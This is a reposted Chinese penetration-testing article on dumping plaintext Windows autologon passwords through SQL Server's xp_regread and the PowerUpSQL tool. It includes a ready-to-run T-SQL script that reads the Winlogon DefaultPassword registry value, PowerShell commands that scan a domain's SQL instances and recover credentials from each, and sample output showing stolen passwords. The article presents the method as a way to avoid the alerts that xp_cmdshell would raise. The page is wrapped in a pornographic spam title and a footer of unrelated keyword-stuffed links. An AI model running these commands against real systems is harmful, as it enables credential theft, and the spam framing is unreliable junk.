成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

通過SQL Server與PowerUpSQL獲取Windows自動登錄密碼

安全 數據安全
在本文中,我將演示如何使用PowerUpSQL通過SQL Server轉儲Windows自動登錄密碼。 我還將談一下例如xp_regread等其他方式存儲過程在滲透測試中利用方法。

[[184013]]

前言

在本文中,我將演示如何使用PowerUpSQL通過SQL Server轉儲Windows自動登錄密碼。 我還將談一下例如xp_regread等其他方式存儲過程在滲透測試中利用方法。

xp_regread的簡短歷史

自SQL Server 2000以來,xp_regread擴展存儲過程一直存在。自從SQL Server 2000允許Public角色的成員訪問SQL Server服務帳戶中任何有權限的東西。 當時,它有一個非常大的影響,因為常見的SQL Server作為LocalSystem運行。

自從SQL Server 2000 SP4發布以來,xp_regread的影響已經相當小,由于添加了一些訪問控制,防止低特權登錄的用戶去訪問注冊表敏感的位置。 現在,無權限用戶只可訪問與SQL Server相關的注冊表位置。 有關這些的列表,請訪問https://support.microsoft.com/en-us/kb/887165

以下是一些更有趣的訪問路徑:

  1. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Microsoft SQL Server \  
  2. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ MSSQLServer  
  3. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Search  
  4. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ SQLServer  
  5. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows消息子系統  
  6. HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ EventLog \ Application \ SQLServer  
  7. HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ SNMP \ Parameters \ ExtensionAgents  
  8. HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ SQLServer  
  9. HKEY_CURRENT_USER \ Software \ Microsoft \ Mail HKEY_CURRENT_USER \ Control Panel \ International 

具有 Public權限的xp_regread的實際用途

xp_regread可以用來獲取很多有用的信息。 事實上,當作為最低權限登錄時,我們可以使用它來獲取無法在通過其他方式而獲得的服務器信息。 例如,PowerUpSQL中的Get-SQLServerInfo函數可以得到一些信息。

  1. PS C:\> Get-SQLServerInfo 
  2. ComputerName           : SQLServer1 
  3. Instance               : SQLServer1 
  4. DomainName             : demo.local 
  5. ServiceName            : MSSQLSERVER 
  6. ServiceAccount         : NT Service\MSSQLSERVER 
  7. AuthenticationMode     : Windows and SQL Server Authentication 
  8. Clustered              : No 
  9. SQLServerVersionNumber : 12.0.4213.0 
  10. SQLServerMajorVersion  : 2014 
  11. SQLServerEdition       : Developer Edition (64-bit) 
  12. SQLServerServicePack   : SP1 
  13. OSArchitecture         : X64 
  14. OsMachineType          : WinNT 
  15. OSVersionName          : Windows 8.1 Pro 
  16. OsVersionNumber        : 6.3 
  17. Currentlogin           : demo\user 
  18. IsSysadmin             : Yes 
  19. ActiveSessions         : 3 

在SQL Server SP4中實現的訪問控制限制不適用于sysadmins。 因此,SQL Server服務帳戶可以在注冊表中訪問的任何內容,sysadmin可以通過xp_regread訪問。

乍一看,這可能不是一個大問題,但它確實允許我們從注冊表中提取敏感數據,而無需啟用xp_cmdshell,當xp_cmdshell啟用和使用時可能會觸發大量警報。

使用xp_regread恢復Windows自動登錄憑據

可以將Windows配置為在計算機啟動時自動登錄。 雖然這不是企業環境中的常見配置,但這是我們在其他環境中經常看到的。 特別是那些支持傳統POS終端和Kiosk與本地運行SQL Server的。 在大多數情況下,當Windows配置為自動登錄時,未加密的憑據存儲在注冊表項中:

  1. HKEY_LOCAL_MACHINE SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon 

利用該信息,我們可以編寫一個基本的TSQL腳本,該腳本使用xp_regread將自動登錄憑據從我們的注冊表中提取出來,而無需啟用xp_cmdshell。 下面是一個TSQL腳本示例,但由于注冊表路徑不在允許的列表中,我們必須將查詢作為sysadmin運行:

  1. ------------------------------------------------------------------------- 
  2. -- Get Windows Auto Login Credentials from the Registry 
  3. ------------------------------------------------------------------------- 
  4. -- Get AutoLogin Default Domain 
  5. DECLARE @AutoLoginDomain  SYSNAME 
  6. EXECUTE master.dbo.xp_regread 
  7. @rootkey        = N'HKEY_LOCAL_MACHINE'
  8. @key            = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
  9. @value_name     = N'DefaultDomainName'
  10. @value          = @AutoLoginDomain output 
  11. -- Get AutoLogin DefaultUsername 
  12. DECLARE @AutoLoginUser  SYSNAME 
  13. EXECUTE master.dbo.xp_regread 
  14. @rootkey        = N'HKEY_LOCAL_MACHINE'
  15. @key            = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
  16. @value_name     = N'DefaultUserName'
  17. @value          = @AutoLoginUser output 
  18. -- Get AutoLogin DefaultUsername 
  19. DECLARE @AutoLoginPassword  SYSNAME 
  20. EXECUTE master.dbo.xp_regread 
  21. @rootkey        = N'HKEY_LOCAL_MACHINE'
  22. @key            = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
  23. @value_name     = N'DefaultPassword'
  24. @value          = @AutoLoginPassword output  
  25. -- Display Results 
  26. SELECT @AutoLoginDomain, @AutoLoginUser, @AutoLoginPassword 

我還創建了一個名為“Get-SQLRecoverPwAutoLogon”的PowerUpSQL函數,所以你可以直接運行它。 它將獲取到默認Windows自動登錄信息和備用Windows自動登錄信息(如果已設置)。 然后它返回相關的域名,用戶名和密碼。

下面是命令示例。

  1. PS C:\> $Accessible = Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose -Threads 15| Where-Object {$_.Status –eq “Accessible”} 
  2. PS C:\> $Accessible | Get-SQLRecoverPwAutoLogon -Verbose 
  3. VERBOSE: SQLServer1.demo.local\Instance1 : Connection Success. 
  4. VERBOSE: SQLServer2.demo.local\Application : Connection Success. 
  5. VERBOSE: SQLServer2.demo.local\Application : This function requires sysadmin privileges. Done. 
  6. VERBOSE: SQLServer3.demo.local\2014 : Connection Success. 
  7. VERBOSE: SQLServer3.demo.local\2014 : This function requires sysadmin privileges. Done. 
  8. ComputerName : SQLServer1 
  9. Instance     : SQLServer1\Instance1 
  10. Domain       : demo.local 
  11. UserName     : KioskAdmin 
  12. Password     : test 
  13. ComputerName : SQLServer1 
  14. Instance     : SQLServer1\Instance1 
  15. Domain       : demo.local 
  16. UserName     : kioskuser 
  17. Password     : KioskUserPassword! 

結尾

即使xp_regread擴展存儲過程已被部分關閉,不過仍然有很多方法,可以證明在滲透測試期間十分有用。 希望你會與“Get-SQLServerInfo”,“Get-SQLRecoverPwAutoLogon”函數有更多樂趣。

責任編輯:趙寧寧 來源: 安全客
相關推薦

2016-10-09 20:08:58

2010-07-01 11:29:57

SQL Server實

2011-04-06 14:16:49

SQL Server自動備份

2010-07-02 14:52:21

SQL Server元

2009-08-13 16:28:07

windows2008密碼驗證

2016-06-27 09:37:35

2011-04-22 15:00:22

SQLwin7登錄

2021-07-29 23:21:01

Windows 8Windows微軟

2010-11-08 14:32:00

SQL Server登

2010-07-19 14:24:15

SQL Server盤

2010-12-16 11:01:55

Windows Ser

2016-10-14 08:45:19

Windows 10隱藏密碼

2016-12-22 09:11:24

Windows 10Windows 8Windows 7

2009-05-14 13:18:50

SQL Server代理任務微軟

2010-07-07 13:58:25

SQL Server死

2010-06-23 09:23:56

SQL Server

2011-04-18 13:02:08

SQL Server SQL Server

2010-07-22 16:02:29

2009-08-25 16:16:27

C#調用Windows

2010-04-27 09:48:09

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 91免费在线看 | 成人在线视频免费看 | 日韩一区二区在线播放 | 视频在线一区二区 | 91传媒在线观看 | 午夜国产 | 国产一区中文字幕 | 免费观看成人av | 日韩欧美国产精品一区二区 | 在线观看中文字幕dvd播放 | 国产精品一区三区 | 欧美亚洲视频 | 一级毛片视频 | 欧美一级电影免费 | 午夜精品一区二区三区在线视频 | 国内精品99 | 噜噜噜噜狠狠狠7777视频 | 国产日韩欧美激情 | 成人99| 精品欧美久久 | 国产 日韩 欧美 中文 在线播放 | 国产在线中文字幕 | 日本一二三区在线观看 | 黄色免费网站在线看 | 久久视频精品 | 精品一区二区久久久久久久网精 | 日韩欧美在线视频 | 欧美精品久久久 | 国产www在线 | 日本久久网| 精品国产99 | www.色综合| 日韩一区二区三区在线 | 欧美 日韩 综合 | 在线免费观看成人 | 视频一区二区三区中文字幕 | 久久伦理中文字幕 | 国产福利资源在线 | 中文字幕精品视频 | 超碰精品在线观看 | 国产成人av一区二区三区 |